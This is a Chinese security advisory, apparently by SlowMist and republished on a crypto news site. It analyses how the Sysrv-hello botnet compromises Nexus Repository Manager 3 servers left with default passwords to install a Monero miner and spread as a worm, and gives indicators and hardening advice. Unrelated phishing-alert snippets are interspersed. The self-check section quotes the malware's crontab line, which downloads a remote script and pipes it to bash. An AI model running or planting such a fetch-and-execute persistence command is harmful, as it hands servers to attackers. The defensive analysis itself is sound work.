慢雾：技术拆解 Sysrv-hello 僵尸网络入侵原理

攻击路径

Sysrv-hello僵尸网络对云上NexusRepositoryManager3存在默认帐号密码的服务器进行攻击，Maven私服部署会用到NexusRepositoryManager3，由于Maven是个流行服务，所以也给了Sysrv-hello僵尸网络的大范围感染机会。

当NexusRepositoryManager3服务对外网开放且存在默认账号密码时，Sysrv-hello就可以直接扫描入侵，利用NexusRepositoryManager3的Tasks功能模块直接运行恶意脚本达到入侵服务器的目的。

慢雾：针对macOS系统恶意软件RustBucket窃取系统信息:金色财经报道，SlowMist发布安全警报，针对macOS 运行系统的 Rust 和 Objective-C 编写的恶意软件RustBucket，感染链由一个 macOS 安装程序组成，该安装程序安装了一个带后门但功能正常的 PDF 阅读器。然后伪造的 PDF 阅读器需要打开一个特定的 PDF 文件，该文件作为触发恶意活动的密钥。[2023/5/23 15:20:27]

入侵到服务器后会自动下载执行ldr.sh文件，该文件主要功能：1.禁用Linux服务器防火墙(ufw)及清空iptables2.删除aliyun、yunjing等主机安全软件3.禁用apparmor、selinux、watchdog等安全机制4.删除其他竞品5.下载门罗币挖矿程序进行挖矿，文件与进程名为network016.下载第二个木马sysrv进行更高级操作7.在crontab里加上尾巴

慢雾：近期出现假冒UniSat的钓鱼网站，请勿交互:5月13日消息，慢雾首席信息安全官 @IM_23pds 在社交媒体上发文表示，近期有假冒比特币铭文钱包及交易市场平台 UniSat 的钓鱼网站出现，经慢雾分析，假网站有明显的传统针对 ETH、NFT 钓鱼团伙的作案特征，或因近期 BRC-20 领域火热故转而制作有关该领域的钓鱼网站，请用户注意风险，谨慎辨别。[2023/5/13 15:01:11]

第二个木马sysrv的主要功能：1.确保门罗币挖矿程序network01正常运行2.进行蠕虫传播，随机扫描其他IP服务，同样进行NexusRepositoryManager3漏洞利用，同时也会尝试入侵MySQL、Tomcat、WebLogic等服务

慢雾：警惕 Terra 链上项目被恶意广告投放钓鱼风险:据慢雾区情报，近期 Terra 链上部分用户的资产被恶意转出。慢雾安全团队发现从 4 月 12 日开始至 4 月 21 日约有 52 个地址中的资金被恶意转出至 terra1fz57nt6t3nnxel6q77wsmxxdesn7rgy0h27x30 中，当前总损失约 431 万美金。

经过慢雾安全追踪分析确认，此次攻击为批量谷歌关键词广告投放钓鱼，用户在谷歌搜索如：astroport，nexus protocol，anchor protocol 等这些知名的 Terra 项目，谷歌结果页第一条看似正常的广告链接（显示的域名甚至是一样的）实为钓鱼网站。 一旦用户不注意访问此钓鱼网站，点击连接钱包时，钓鱼网站会提醒直接输入助记词，一旦用户输入并点击提交，资产将会被攻击者盗取。

慢雾安全团队建议 Terra 链上用户保持警惕不要随便点击谷歌搜索出来的链接或点击来历不明的链接，减少使用常用钱包进行非必要的操作，避免不必要的资损。[2022/4/21 14:37:55]

自查方法

进程：network01sysrv

文件：/tmp/network01/tmp/sysrv/tmp/flag.txt

crontab：echo"*/9****(curl-fsSL$cc/ldr.sh||wget-q-O-$cc/ldr.sh)|bash>/dev/null2>&1"|crontab-

端口：52013

存在以上这些，停止备份样本后删除。

加固建议

删除NexusRepositoryManager3Tasks里的恶意代码NexusRepositoryManager3严禁外网访问，严禁默认账号密码NexusRepositoryManager3升级为最新版本被入侵服务器备份重要数据后，重配置或重做检查被入侵服务器是否存在直接访问生产网其他服务的能力，存在则在生产网其他服务所在的服务器上进一步分析是否有异常免责声明：作为区块链信息平台，本站所发布文章仅代表作者个人观点，与链闻ChainNews立场无关。文章内的信息、意见等均仅供参考，并非作为或被视为实际投资建议。

本文来源于非小号媒体平台：

慢雾科技

现已在非小号资讯平台发布68篇作品，

非小号开放平台欢迎币圈作者入驻

入驻指南：

/apply_guide/

本文网址：

/news/9606255.html

免责声明：

1.资讯内容不构成投资建议，投资者应独立决策并自行承担风险

2.本文版权归属原作所有，仅代表作者本人观点，不代表非小号的观点或立场

上一篇：

深入解析MakeDao在新周期里的机遇和风险

标签：NexusNEXMANATORNexus Mutualnexo币挖矿教程MANA币dAppstore

币赢交易所热门资讯